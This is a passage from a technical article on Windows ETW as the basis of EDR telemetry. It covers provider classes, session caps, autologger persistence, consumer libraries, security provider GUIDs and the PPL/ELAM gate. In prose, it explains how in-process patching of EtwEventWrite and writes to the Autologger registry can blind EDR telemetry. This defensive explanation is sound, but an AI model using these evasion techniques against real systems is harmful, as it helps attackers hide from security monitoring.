The MOF model was workable for a single-consumer world. A performance-tuning team running an in-house tool could enable the provider, capture, and disable. As the substrate of a security stack with multiple agents on the same host, it could not work. The mid-2000s had not yet produced a "multiple agents on the same host" world, so the limit did not bite immediately. By 2007 it would.

Class	Era	Schema location	Sessions/provider	Adoption in 2026
MOF / classic	2000	WMI repository	1	Niche; mostly NT Kernel Logger
WPP	2002	`.pdb` (TMF)	1	Pervasive inside Windows internals
Manifest-based	2007 (Vista)	XML manifest	8	Dominant for security telemetry
TraceLogging	2015 (Win10)	Inline (TLV)	8	Rising for new app/service code

A handful of classic providers survived the 2007 transition and are still significant. The most important is the NT Kernel Logger [@ms-etw-sessions] [@ms-etw-sessions], the special-purpose system session that captures high-throughput kernel events: file I/O, disk I/O, registry operations, network packets. On most consumer SKUs it remains the only path to those event streams at line rate. Sysmon and most kernel-level diagnostics tools use the NT Kernel Logger or its modern descendants.The NT Kernel Logger is a system reserved logger. There is exactly one of it on a host, and the kernel itself owns the buffers. Tools that want kernel disk, file, registry, or network events at high throughput typically subscribe through it rather than through manifest providers. This is why a host can have eight Microsoft-Windows-Kernel-File consumers but cannot easily have two simultaneous full-fidelity disk I/O traces.

By 2007 Microsoft knew the one-session limit had to go. The fix shipped with Windows Vista in January 2007, and it was the central architectural decision of the entire ETW-as-EDR-substrate story.

4. Vista's eight sessions: the architectural decision that made the modern EDR endpoint possible

Park and Buch open their April 2007 MSDN Magazine article with the line that frames every later development:

On Windows Vista, ETW has gone through a major upgrade, and one of the most significant changes is the introduction of the unified event provider model and APIs. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

The new model raised the per-provider session cap from one to eight. That single number is why Defender, CrowdStrike Falcon, SentinelOne, Sysmon, and a researcher's SilkETW tap can all read Microsoft-Windows-Kernel-Process [@fireeye-silketw-launch] [@fireeye-silketw-launch] from the same host today without one of them stealing events from the others.

The Vista model also unified two things that had been separate. ETW providers wrote to per-CPU ring buffers; the Win32 Event Log was a different facility with its own writer, its own format, and its own consumers. Park and Buch describe the unification verbatim:

The new unified APIs combine logging traces and writing to the Event Viewer into one consistent, easy-to-use mechanism for event providers. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

After Vista, a single EventWrite call from a manifest-based provider lands both in the per-CPU ring buffer for ETW consumers and in the evtx channel for wevtutil and Group Policy audit consumers, depending on how the manifest's channel mappings are configured. The "Event Viewer" the user sees is now a consumer of ETW.

The Vista-era ETW provider class. The provider author writes an XML manifest enumerating events, fields, tasks, opcodes, levels, keywords, and channels. The `mc.exe` message compiler turns the manifest into a binary resource embedded in the provider binary; `wevtutil im` registers the manifest with the system at install time. At runtime the provider calls `EventRegister` once per provider GUID and `EventWrite` per event. Capped at eight trace sessions per provider. A logical destination for an event, declared in a manifest. The four standard channels are *Admin* (operational events for administrators), *Operational* (verbose events for operators), *Analytical* (high-volume events for diagnostics), and *Debug* (developer-only events). When the provider's `EventWrite` fires, the kernel demultiplexes by channel: events with channels enabled in the `evtx` configuration land in the corresponding channel log, while subscribed real-time consumers receive them through their session.

The deployment pipeline for a manifest-based provider is heavier than for a classic provider. The author writes a manifest, compiles it, embeds the resource, and runs wevtutil im at install time. Microsoft Learn calls out the distinction between provider registration and manifest installation [@ms-eventregister] [@ms-eventregister] explicitly, and notes that each process can register up to 1,024 providers [@ms-eventregister] [@ms-eventregister]. In practice few processes come close.

flowchart TD A[Author writes manifest.xml] --> B[mc.exe compiles to binary resource] B --> C[Resource embedded in provider .dll/.exe] C --> D[Installer runs wevtutil im manifest.xml] D --> E[System-wide manifest registry] F[Provider process at runtime] --> G[EventRegister GUID] G --> H[EventWrite per event] H --> I[Per-CPU ring buffer
for ETW sessions] H --> J[Channel demux
Admin / Operational / Analytical / Debug] J --> K[(.evtx log files)] I --> L[Real-time consumers] E -.decode metadata.-> L E -.decode metadata.-> K

The cap rules now read like this: eight trace sessions can enable a manifest-based provider concurrently [@ms-about-etw] [@ms-about-etw]; up to 64 sessions can run on the system at once [@ms-etw-sessions] [@ms-etw-sessions]; EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES when the per-provider cap binds [@ms-enabletraceex2] [@ms-enabletraceex2]. The 8-session number was chosen for ergonomics, not for security planning, but it is the load-bearing number in modern Windows endpoint security.

Key idea: The eight-session cap on manifest-based providers is the single architectural decision that made multi-EDR coexistence on the same Windows host possible. Without it, the second EDR to subscribe to Microsoft-Windows-Kernel-Process would silently steal events from the first.

A 2007-era driver author shipping the inaugural Microsoft-Windows-Kernel-Process provider, GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}, authored a manifest declaring ProcessStart (event ID 1), ProcessStop (event ID 2), ImageLoad (event ID 5), and so on. Defender's MsMpEng.exe could subscribe; the future CrowdStrike Falcon could subscribe; the future Sysmon could subscribe; the future SilkETW researchers could subscribe. None starves another. The Vista unification is the architectural enabler of the modern multi-EDR Windows endpoint.

With multi-consumer concurrency solved, the next problems were authoring overhead and producer integrity. Two parallel paths branched off the Vista manifest model: TraceLogging for the first, the EtwTi PPL/ELAM gate for the second.

5. Two more provider classes: WPP for the kernel tree, TraceLogging for the app tier

Vista's manifest-based providers solved coexistence and decoding, but they were heavy to deploy. Microsoft shipped two more provider classes -- one older than Vista and one younger -- that traded manifest deployment for two different kinds of simplicity.

WPP: the C-preprocessor approach

WPP -- Windows software trace PreProcessor -- predates Vista. Community references and the Park & Buch description of ETW being "abstracted into the Windows preprocessor (WPP) software tracing technology" [@ms-park-buch-2007] place its first WDK ship in the Windows XP era; no Microsoft primary pins a specific build. It became the standard tracing facility inside the Windows kernel tree itself for years. The WDK page [@ms-wpp] [@ms-wpp] frames its purpose:

"WPP software tracing supplements and enhances WMI event tracing by adding ways to simplify tracing the operation of the trace provider. It is an efficient mechanism for the trace provider to log real-time binary messages."

A WPP provider is authored in C with macros that look like printf calls. The C preprocessor expands DoTraceMessage(FlagId, "Frobnicating widget %d", widgetId) into an EventWrite call against an auto-generated provider GUID. Format strings are extracted at build time into a Trace Message Format file embedded in the binary's .pdb. The producer cost is the smallest of any ETW provider class: emitting an event is a function call plus a few stores into a buffer. There is no manifest to deploy, no XML to author.

The corresponding decode cost is the highest. A WPP event arrives at the consumer as a binary payload referencing a TMF identifier. To turn that into a human-readable message the consumer needs the producer's .pdb file. If you do not have the symbols for the binary that emitted the event, you do not know what the event means.

That decode cost is why WPP did not become the EDR substrate. Sealighter's README puts the operational consequence verbatim:

A C-preprocessor-based ETW authoring path inherited from the XP-era WDK. Format strings are extracted to a TMF resource that lives in the producer's `.pdb`. Producer cost is minimal; decode cost requires the producer's symbol files. WPP providers inherit the classic one-session-per-provider cap and are pervasively used inside Windows itself for in-tree dev-time tracing.

"WPP traces compounds the issues, providing almost no easy-to-find data about provider and their events." -- Sealighter README [@gh-sealighter] [@gh-sealighter]

WPP providers also inherit the classic one-session-per-provider cap [@ms-about-etw] [@ms-about-etw], which would have made them unworkable for multi-EDR consumption even if the decode problem were solved. So WPP became the kernel-tree internal tracing facility -- ubiquitous inside Microsoft's source tree, irrelevant outside it.

TraceLogging: schema in the payload

Eight years after Vista, in Windows 10 (2015), Microsoft shipped a parallel path that solved a different problem. TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about] keeps the eight-session cap of manifest providers but eliminates the manifest deployment burden:

"TraceLogging is a system for logging events that can be decoded without a manifest." -- Microsoft Learn, About TraceLogging [@ms-tracelogging-about] [@ms-tracelogging-about]

A TraceLogging event carries its own schema inline. The event payload is a sequence of typed-length-value triples: a one-byte type tag, a length, and the data. A consumer that has never seen the provider before can still decode the event because the names and types of every field are in the event. The provider author needs no XML manifest, no mc.exe, no wevtutil im.

The trade-off is per-event size. Inline schema strings cost bytes per event. For a high-volume provider emitting millions of events per minute, the per-event size matters and a manifest-based provider is correct. For a new component author who wants tracing without an install-time deployment dance, TraceLogging is the right answer.

A self-describing ETW provider class shipped in Windows 10. Schema is inline in each event payload as type-length-value triples; consumers decode without a manifest. Available from C/C++ via `TraceLoggingProvider.h`, from .NET via `EventSource` with `EtwSelfDescribingEventFormat`, and from WinRT via `LoggingChannel`. Inherits the eight-session cap from the manifest-based class.

TraceLogging is also the unified path across runtimes. The same self-describing payload format is emitted from native C/C++, from .NET (when an EventSource opts into EtwSelfDescribingEventFormat), and from kernel-mode drivers [@ms-tracelogging-portal] [@ms-tracelogging-portal]. A consumer using TDH (the Trace Data Helper API) decodes them without distinguishing between the runtime that emitted them.

Four classes, four trade-offs

Class	First Shipped	Schema Location	Sessions/Provider	Decode without symbols/manifest?	Best for
MOF / classic	2000	WMI repository (`mofcomp`)	1	Needs MOF	Legacy components; NT Kernel Logger
WPP	~2002	`.pdb` (TMF)	1	No -- needs producer PDB	In-tree Windows kernel dev-time tracing
Manifest-based	2007 (Vista)	XML manifest, system-installed	8	Needs installed manifest	Shipping security telemetry
TraceLogging	2015 (Win10)	Inline TLV in payload	8	Yes	New apps and services; cross-runtime

Sources for the table: [@ms-about-etw, @ms-etw-config, @ms-tracelogging-about, @ms-wpp].

For new shipping Windows components with a known event vocabulary and high volume, choose manifest-based: smallest per-event size, evtx integration, eight-consumer concurrency. For new cross-runtime open-source providers where deployment friction matters, choose TraceLogging: same eight-consumer concurrency, no XML to author, decodable everywhere. For in-source-tree dev-time tracing inside a binary you already have symbols for, WPP is fine. For new security-relevant providers, never choose classic: the one-session cap is structurally incompatible with multi-EDR coexistence.

Four provider classes, four trade-offs. But every one of them shares a structural weakness: the producer fires from inside the calling process, and any code in that process can patch the runtime entry-point and silence the provider for itself. That is the weakness Adam Chester made famous in 2020, and the one EtwTi was built to defeat.

6. Sessions, buffers, and the autologger registry: where the telemetry actually lives

Open regedit on a Windows host and navigate to HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger. You are looking at the persistence surface of every trace session that survives a reboot on this machine -- and the persistence surface every modern EDR uses to install itself.

A session is the unit ETW actually exposes to controllers. It owns a per-session pool of buffers, a writer thread, a destination (file or real-time consumer), and a list of providers it has subscribed to. The lifecycle is short. A controller fills out an EVENT_TRACE_PROPERTIES structure [@ms-event-trace-props] [@ms-event-trace-props] with a session name, buffer size, logging mode, and destination, then calls StartTrace. The kernel allocates the buffers -- at least two per logical processor [@ms-event-trace-props] [@ms-event-trace-props] -- and returns a session handle. The controller then calls EnableTraceEx2 [@ms-enabletraceex2] [@ms-enabletraceex2] for each provider it wants to subscribe to, passing EVENT_CONTROL_CODE_ENABLE_PROVIDER along with the provider GUID, level, and keyword bitmask.

If the provider's per-class session cap is already saturated, EnableTraceEx2 returns ERROR_NO_SYSTEM_RESOURCES. If the caller lacks the privilege to enable that provider, it returns ERROR_ACCESS_DENIED. We will see both error codes again later, on different paths.The default buffer size sweet spot is small. The Microsoft Learn primary states it explicitly: "Trace sessions with large buffers (256KB or larger) should be used only for diagnostic investigations or testing, not for production tracing." [@ms-event-trace-props] Production session buffer sizes typically sit in the 32-64KB range.

There are three logging modes. File mode writes events to a sequential .etl file on disk; the writer thread drains buffers to disk and the file grows. Circular mode writes to a fixed-size file in a circular buffer; old events are overwritten when the file fills. Real-time mode delivers events to a real-time consumer process via a kernel callback. Defender, EDR sensors, and Sysmon all use real-time mode for their hot paths; they may also write to file as a forensic backup.

A process that calls `OpenTrace` with `LogFileMode = EVENT_TRACE_REAL_TIME_MODE` and receives events live via a registered callback rather than from an `.etl` file on disk. Real-time consumers must keep up with producer rate or events are lost.

The autologger registry path is what makes a session survive a reboot. A subkey under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\<SessionName> defines a session that the kernel starts at boot, before most user-mode services are running. Each subkey's values configure the session: BufferSize, MaximumBuffers, LogFileMode, FileName, plus a nested <SessionName>\<ProviderGuid> subkey for each provider to enable.

A registry-persisted boot-time ETW session. The kernel reads `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\` at boot, creates the session, enables the configured providers, and begins capture before user-mode services start. Defender's Sense agent, CrowdStrike's Falcon sensor, and Sysmon's driver all install autologgers here.

Defender's DiagTrack, Microsoft-Windows-Diagnosis-PCW, the SQM kernel logger, the EventLog-Application channel autologger -- all live here (observable via logman query -ets on a stock Windows install). Third-party EDRs add their own. The Palantir CIRT taxonomy [@palantir-tampering-wayback] (about which more in section 11) frames this registry surface as the persistent-tampering target: an attacker who can write to this subtree can disable an EDR's boot-time tracing without ever interacting with the running EDR process. The events of interest never get captured because the session never starts.

There is a related concept worth naming: the Global Logger. This is a special autologger session whose configuration lives in HKLM\SYSTEM\CurrentControlSet\Control\WMI\GlobalLogger. It is the boot-time tracing path that comes online before any user-mode service, including before Sense and the EDR sensor. It exists to capture early-boot kernel events that no later session can record.

flowchart TD R[HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\] --> S1[DiagTrack-Listener] R --> S2[Defender-Listener] R --> S3[ThirdPartyEDR-Sensor] R --> SG[GlobalLogger] S2 --> S2P[Provider GUIDs subkeys] S2 --> S2C[BufferSize / MaximumBuffers / LogFileMode] S2 --> S2F[FileName=.etl path] S2P --> KS[Kernel reads at boot] S2C --> KS S2F --> KS KS --> Started[Session started before user-mode services]

Note: logman query -ets enumerates every live trace session on the host. Cross-reference against the subkeys in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ to find sessions configured to start at boot. Any unauthorised entry -- a session you do not recognise, an autologger pointed at a destination outside your EDR's data path, a provider GUID you cannot account for -- belongs in your incident response queue. We return to this in section 14.

ERROR_NO_SYSTEM_RESOURCES from EnableTraceEx2 is the runtime symptom of the eight-session cap binding [@ms-enabletraceex2]. SOC engineers debugging multi-EDR coexistence problems should look for it in their sensor's diagnostic output. Eight subscribers per manifest provider is enough for the typical Defender + third-party EDR + Sysmon + research tap arrangement, but a host running multiple research-mode tracers can saturate it.

Persistence solved: a session the OS starts at every boot. But who reads it? That requires a consumer process, and consumers are where the architecture forks along the security spectrum.

7. Consumer architecture: from `OpenTrace` to KrabsETW to a 30-line process watcher

The consumer side of ETW is mechanically simple -- three calls to open a trace, register a callback, and process events -- but the choice of library tells you almost everything about what kind of EDR you are building.

The native pattern is three Win32 calls. EnableTraceEx2 subscribes the session to a provider GUID with a level and keyword bitmask. OpenTrace returns a handle on the session for consumption. ProcessTrace blocks the calling thread, drains events from the kernel's per-CPU buffers, and dispatches each one to a registered callback. Each event arrives as an EVENT_RECORD containing a header (provider GUID, event ID, level, keyword, opcode, timestamp, process ID, thread ID) and a payload that the consumer decodes.

For manifest providers the consumer decodes via TDH (the Trace Data Helper API) against the system-installed manifest. For TraceLogging providers the consumer decodes from the inline TLV payload. For classic and WPP providers the consumer needs the MOF schema or the producer's PDB respectively.

The Win32 decoder API that turns a raw `EVENT_RECORD` payload into typed fields, using the registered manifest as the schema source. `TdhGetEventInformation` returns a `TRACE_EVENT_INFO` structure with the field names, types, and offsets; `TdhFormatProperty` extracts each field. TDH is what makes manifest events self-describing at the consumer end, even though the schema lives out of band. sequenceDiagram participant C as Consumer process participant K as Kernel ETW subsystem participant P as Provider process C->>K: StartTrace(session) C->>K: EnableTraceEx2(session, providerGuid, level, keyword) K-->>P: Provider notified to begin emitting C->>K: OpenTrace(session) K-->>C: TraceHandle C->>K: ProcessTrace(handle) [blocking] P->>K: EventWrite(payload) K-->>C: callback(EVENT_RECORD) P->>K: EventWrite(payload) K-->>C: callback(EVENT_RECORD) Note over C,K: ProcessTrace returns only when session ends

In production almost no one writes the raw three-call pattern. The library universe settled into a small set of widely-used wrappers, and the choice of wrapper maps almost one-to-one onto the kind of EDR the engineering team is building.

krabsetw [@gh-krabsetw] [@gh-krabsetw] is a Microsoft-authored C++ library that simplifies session and provider management. Its README explicitly notes the production caller: a C++/CLI wrapper called Microsoft.O365.Security.Native.ETW, "used in production by the Office 365 Security team. It's affectionately referred to as Lobsters." If you are building an in-house EDR or a security analytics pipeline in C++ on Windows, krabsetw is the default choice.

Microsoft.Diagnostics.Tracing.TraceEvent [@nuget-traceprocessing] [@nuget-traceprocessing] is the general-purpose .NET ETW library, distributed as a NuGet package and used heavily inside the .NET diagnostics community. Microsoft's separate Microsoft.Windows.EventTracing.Processing.All package is the .NET TraceProcessing API [@ms-etw-portal] [@ms-etw-portal] that the Windows engineering team uses internally to analyze ETW data from the Windows engineering system.

SilkETW [@gh-silketw] [@gh-silketw], originally released by Ruben Boonen at FireEye in March 2019 [@fireeye-silketw-launch] [@fireeye-silketw-launch] (now maintained by Mandiant), wraps Microsoft.Diagnostics.Tracing.TraceEvent to expose ETW telemetry to detection-engineering and threat-hunting workflows. SilkETW is the canonical "blue team research" consumer: the tool you reach for when you want to see what events a provider actually emits without writing C++.

Sealighter [@gh-sealighter] [@gh-sealighter], by pathtofile, is a krabsetw-wrapping C++ tool that makes multi-provider subscription and filtering tractable from a JSON config. The README states: "Sealighter leverages the feature-rich Krabs ETW Library to enable detailed filtering and triage of ETW and WPP Providers and Events." Sealighter is the canonical "red/blue team triage" consumer: more flexible than SilkETW, less code to write than raw krabsetw.

The pitfalls are universal across all four libraries. The krabsetw README spells two of them out:

"The call to 'start' on the trace object is blocking so thread management may be necessary." -- [@gh-krabsetw]

"Throwing exceptions in the event handler callback ... will cause the trace to stop processing events." -- [@gh-krabsetw]

Both have caused real production outages. An EDR that throws an unhandled exception in its event callback dies silently as an ETW consumer, and the next event the provider emits goes nowhere.The "throwing in the callback stops the trace" pitfall is the gotcha that bites every team writing their first ETW consumer. The kernel does not catch the exception; the trace simply ends. A production-quality consumer wraps every callback in try/catch (or its language equivalent) and routes failures through a side channel, not through the trace itself.

To make the structure concrete, here is what a 30-line Microsoft-Windows-Kernel-Process real-time consumer looks like, written in TypeScript pseudocode that mirrors the structure a Sealighter or krabsetw user would write:

{` // Pseudocode: the structure of a krabsetw / Sealighter consumer // for the Microsoft-Windows-Kernel-Process provider.

const KERNEL_PROCESS_GUID = "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}";

const session = new UserTraceSession("MyEdrSensor");

const provider = new Provider(KERNEL_PROCESS_GUID); provider.level = TraceLevel.Information; provider.anyKeyword = 0xFFFFFFFFFFFFFFFFn;

provider.onEvent = (event) => { try { switch (event.id) { case 1: // ProcessStart const pid = event.fields.ProcessID; const imageName = event.fields.ImageName; const cmdLine = event.fields.CommandLine; console.log(`Process start pid=${pid} image=${imageName}`); break; case 2: // ProcessStop console.log(`Process stop pid=${event.fields.ProcessID}`); break; case 5: // ImageLoad console.log(`Image load ${event.fields.ImageName} into pid=${event.fields.ProcessID}`); break; } } catch (e) { // never let an exception escape the callback sideChannelLog(e); } };

session.enable(provider); session.start(); // blocks until session.stop() is called `}

That code, in production form, is a working EDR sensor's process watcher. Every commercial Windows EDR has something with the same structure inside it.

Note: krabsetw wraps the C++ surface and is the default for production in-house EDRs. TraceEvent wraps .NET and is the default for diagnostics tooling. SilkETW exposes ETW to detection engineers without C++. Sealighter wraps krabsetw with a config file for triage. Pick the library that matches the team that will own the consumer, not the one that looks most powerful.

This is what Sysmon, Wazuh, and Elastic Defend look like under the hood -- a SYSTEM-privileged user-mode service consuming public providers. But there is one provider this code cannot subscribe to. Try it and EnableTraceEx2 returns ERROR_ACCESS_DENIED. The next two sections are about the GUID that requires a passport.

8. The security provider catalogue: what EDRs actually read

There are roughly 1,300 manifest-based providers shipped on a 2026 Windows 11 24H2 install -- the community-maintained jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the count across builds, and the repnz manifest archive [@gh-repnz] [@gh-repnz] holds byte-stable copies of the manifests for cross-version diffing. Eight of those providers carry almost all the security telemetry the EDR vendors read. This is the catalogue.

`Microsoft-Windows-Security-Auditing`

GUID {54849625-5478-4994-A5BA-3E3B0328C30D}. The audit-policy-driven Security event log producer. Event ID 4624 (logon), 4625 (failed logon), 4634 (logoff), 4688 (process create with command line) [@learn-microsoft-com-event-4688] [@ms-event-4624], 4689 (process exit), and the broader subcategory audit policy events. This is the closure for the legacy Security event log: when an administrator turns on "audit logon events" in the local security policy, this is the provider that emits the events. EDRs that consume it are reading the same stream the Event Viewer's Security log shows.

`Microsoft-Windows-Kernel-Process`

GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}. The canonical real-time process telemetry source for non-PPL EDR. Event ID 1 fires on ProcessStart with PID, parent PID, image name, command line, and SID; event ID 2 on ProcessStop; event ID 3 on thread create; event ID 4 on thread exit; event ID 5 on ImageLoad with the loaded module name and base address. SilkETW's launch post enumerates the event record format inline [@fireeye-silketw-launch] [@fireeye-silketw-launch]. This provider is widely cited in EDR community documentation as available since Windows 7, though no Microsoft primary pins the exact build.

`Microsoft-Windows-Kernel-File`, `Microsoft-Windows-Kernel-Network`, `Microsoft-Windows-Kernel-Registry`

The per-subsystem siblings of Kernel-Process. Kernel-File surfaces file open / close / read / write / delete operations with the file path and the operating PID. Kernel-Network surfaces TCP and UDP send / receive with the local and remote endpoints. Kernel-Registry surfaces registry create / open / set value / delete with the key path and value name. All three use the manifest-based class and inherit the eight-session cap. EDRs that want full-fidelity per-syscall telemetry without writing kernel callbacks subscribe to these three.

`Microsoft-Antimalware-Scan-Interface`

GUID {2A576B87-09A7-520E-C21A-4942F0271D67}, documented in the Microsoft Learn AMSI portal [@ms-amsi-portal] [@ms-amsi-portal] and surveyed in the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback]. This is the ETW provider that surfaces AMSI scan results: a script block submitted by PowerShell, JScript, VBA, an Office macro engine, or any other AMSI client comes through here after deobfuscation. Whatever string the script engine is about to execute, the registered antimalware engine sees in plaintext, and the result of the scan is published via this provider for any listener.

A COM interface exposed by Windows since 2015 that script engines and runtime hosts can call into to submit content for malware scanning. The Microsoft Learn AMSI portal lists PowerShell, JScript and VBScript via Windows Script Host, Office VBA macros, and User Account Control as in-box integrators [@ms-amsi-portal]; the .NET CLR's assembly load path joined the list with .NET Framework 4.8, as documented in Adam Chester's CLR walk-through [@xpn-hiding-dotnet]. The scanned content is the post-deobfuscation form -- the actual code about to execute, not the obfuscated wrapper. Scan results surface via the `Microsoft-Antimalware-Scan-Interface` ETW provider.

The AMSI Operational event log channel typically appears empty by default. The Palantir taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback] notes the keyword bitmask configured for the channel does not surface scan-result events. The events fire on the ETW bus and can be consumed in real time, but they do not land in the user-visible evtx log unless the consumer reconfigures the keyword mask.

`Microsoft-Windows-PowerShell`

GUID {a0c1853b-5c40-4b15-8766-3cf1c58f985a}. Event ID 4104 is the script-block-logging event that records each PowerShell script block before execution; event ID 4103 records pipeline execution detail; event ID 4100 records errors. The Microsoft Learn about_Logging_Windows reference (Windows PowerShell 5.1) [@ms-powershell-logging] [@ms-powershell-logging] documents EID 4104 verbatim ("EventId 4104 / 0x1008 ... Channel Operational ... Task CommandStart") and the script-block-logging configuration. PowerShell Core 7+ uses a separate ETW provider (PowerShellCore, GUID {f90714a8-5509-434a-bf6d-b1624c8a19a2}). Combined with AMSI the two providers give an EDR the executed PowerShell content twice: once at AMSI submission, once at script-block logging. Detection engineers use both as cross-checks.

`Microsoft-Windows-DotNETRuntime`

GUID {e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}, verbatim in Adam Chester's PoC source [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The .NET CLR provider. Surfaces assembly load events, JIT compilation, AppDomain creation, exception throws. Critical for detecting Cobalt Strike's execute-assembly style of in-memory .NET payload loading. This is the provider that goes dark in the section 1 hook scene after the operator's EtwEventWrite patch.This is the provider Adam Chester targeted in the canonical March 17, 2020 ETW patching post [@xpn-hiding-dotnet]. The Cobalt Strike execute-assembly workflow produces a loud signal here -- "assembly X loaded into PID Y from in-memory source Z" -- so silencing it locally was a valuable evasion. The story comes back in section 11.

`Microsoft-Windows-Sysmon`

GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}, surfaced by wevtutil gp Microsoft-Windows-Sysmon and inventoried in [@gh-jdu2600]; the Microsoft Learn Sysmon page by Russinovich and Garnier [@ms-sysmon] [@ms-sysmon] documents authorship, the protected-process status, and the Microsoft-Windows-Sysmon/Operational channel. This is the publishing side of Sysmon. Sysmon's kernel driver SysmonDrv.sys collects events through PsSetCreateProcessNotifyRoutineEx and friends; the user-mode service then republishes via this ETW provider so any consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) can subscribe without writing its own kernel driver. Events also land in the Microsoft-Windows-Sysmon/Operational evtx channel.

`Microsoft-Windows-Threat-Intelligence` (EtwTi)

GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, verbatim in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]. The only ETW source in the catalogue that fires from inside the kernel for memory-modifying syscalls. Ten task IDs, all prefixed KERNEL_THREATINT_TASK_:

ALLOCVM (NtAllocateVirtualMemory -- local and cross-process)
PROTECTVM (NtProtectVirtualMemory)
MAPVIEW (section mapping; cross-process and self)
QUEUEUSERAPC (NtQueueApcThread cross-process)
SETTHREADCONTEXT (NtSetContextThread cross-process)
READVM (NtReadVirtualMemory -- local and cross-process)
WRITEVM (NtWriteVirtualMemory -- local and cross-process)
SUSPENDRESUME_THREAD
SUSPENDRESUME_PROCESS
DRIVER_DEVICE

Each task pairs with a 64-bit keyword bitmask that distinguishes LOCAL vs REMOTE (cross-process) and KERNEL_CALLER vs not. The Elastic Security Labs walkthrough [@elastic-doubling-down] [@elastic-doubling-down] lists the named Win32/Nt syscalls that surface here:

"The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider ... VirtualAlloc, VirtualProtect, MapViewOfFile, VirtualAllocEx, VirtualProtectEx, MapViewOfFile2, QueueUserAPC, SetThreadContext, WriteProcessMemory, ReadProcessMemory(lsass)" -- Elastic Security Labs [@elastic-doubling-down] [@elastic-doubling-down]

The kernel-emitted ETW provider for memory-modifying syscalls. GUID `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`. Events are emitted from the kernel side of the syscall path (not from a user-mode trampoline), which makes the provider unreachable from a user-mode patcher in the calling process. Consumption is gated behind Protected Process Light at the Antimalware signer level, paired with an Early Launch Antimalware driver. The provider first shipped in the Windows 10 RS-era; the precise build is not stated verbatim in any Microsoft primary located, with community references converging on no later than 1709.

The first-ship-build is hedged: the provider GUID and task inventory are well-documented in third-party reverse-engineering primaries, but no Microsoft primary located in the source verification stage pins the exact build. The community reference range is Windows 10 1607 (RS1) through 1709 (RS3). The dispositive practical evidence is Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir], which shows live-debugger output of CSFalconService.exe (CrowdStrike) holding EtwConsumer handles to multiple logger IDs simultaneously. By 2023 third-party EDRs were demonstrably consuming EtwTi at scale.

The catalogue as a single screen

Provider name	GUID	Surface	Gate	Primary source
Microsoft-Windows-Security-Auditing	`{54849625-5478-4994-A5BA-3E3B0328C30D}`	Audit-policy events (4624/4625/4688/...)	None (Local Security Policy)	[@ms-event-4624]
Microsoft-Windows-Kernel-Process	`{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}`	Process / thread / image-load events	None (admin)	[@fireeye-silketw-launch], [@gh-jdu2600]
Microsoft-Windows-Kernel-File	(manifest archive)	File I/O syscalls	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Network	(manifest archive)	TCP/UDP send/receive	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Registry	(manifest archive)	Registry create/open/set/delete	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Antimalware-Scan-Interface	`{2A576B87-09A7-520E-C21A-4942F0271D67}`	Post-deobfuscation script content	None (admin)	[@ms-amsi-portal], [@palantir-tampering-wayback]
Microsoft-Windows-PowerShell	`{a0c1853b-5c40-4b15-8766-3cf1c58f985a}`	Script-block logging (4104), pipeline	None (admin)	[@gh-jdu2600]
Microsoft-Windows-DotNETRuntime	`{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}`	CLR assembly load, JIT, exceptions	None (admin)	[@xpn-hiding-dotnet]
Microsoft-Windows-Sysmon	`{5770385F-C22A-43E0-BF4C-06F5698FFBD9}`	Sysmon driver re-publication	None (admin)	[@gh-jdu2600], [@ms-sysmon]
Microsoft-Windows-Threat-Intelligence	`{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`	Memory-modifying syscalls (kernel-emitted)	PPL + ELAM (Antimalware signer level)	[@fluxsec-eti], [@elastic-doubling-down]

This is the *security* catalogue. The full Windows manifest-based provider list is roughly 1,300 entries on a current Windows 11 build; performance-tuning, diagnostic, and developer-facing providers fill out the rest. The jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the full list across Win10 versions; the repnz archive [@gh-repnz] [@gh-repnz] preserves byte-stable manifest copies for cross-version diffing.

Nine of the ten rows in that table are accessible to any SYSTEM-privileged user-mode service. The tenth -- EtwTi -- requires a passport. The next section is about who issues the passport.

9. The PPL / ELAM gate: why EtwTi is not for everyone

To consume the one ETW provider that fires from the kernel for memory-modifying syscalls, your service must be (a) a Protected Process Light [@paragmali-com-app-ide], (b) signed at the Antimalware signer level with EKU 1.3.6.1.4.1.311.61.4.1, and (c) loaded from disk by an Early Launch Antimalware [@paragmali-com-to-userini] driver registered at boot. Two of those three were not possible for third parties until the Windows 10 RS-era.

fluxsec.red [@fluxsec-eti] [@fluxsec-eti] gives the prerequisite list verbatim:

"In order to start receiving ETW:TI signals, we need: 1. A service running as Protected Process Light, 2. An Early Launch Antimalware driver and certificate, 3. A logging mechanism." -- [@fluxsec-eti]

Each prerequisite has a story.

Protected Process Light at the Antimalware signer level

